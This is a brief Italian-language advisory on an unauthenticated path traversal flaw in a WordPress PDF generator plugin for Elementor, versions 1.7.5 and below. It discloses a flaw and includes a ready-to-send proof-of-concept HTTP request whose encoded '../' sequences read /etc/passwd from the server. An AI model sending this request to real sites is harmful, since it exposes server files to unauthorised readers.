
PDF Generator Addon per Elementor Page Builder <= 1.7.5 - Download di file arbitrario non autenticato
PDF Generator Addon per Elementor Page Builder <= 1.7.5 - Download arbitrario di file non autenticato
Il plugin PDF Generator Addon per Elementor Page Builder per WordPress è vulnerabile a Path Traversal in tutte le versioni fino alla 1.7.5 inclusa tramite la funzione rtw_pgaepb_dwnld_pdf(). Ciò consente ad attaccanti non autenticati di leggere il contenuto di file arbitrari sul server, che possono contenere informazioni sensibili.
GET /elementor-84/?rtw_generate_pdf=true&rtw_pdf_file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1
Host: kubernetes.docker.internal
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Priority: u=0, i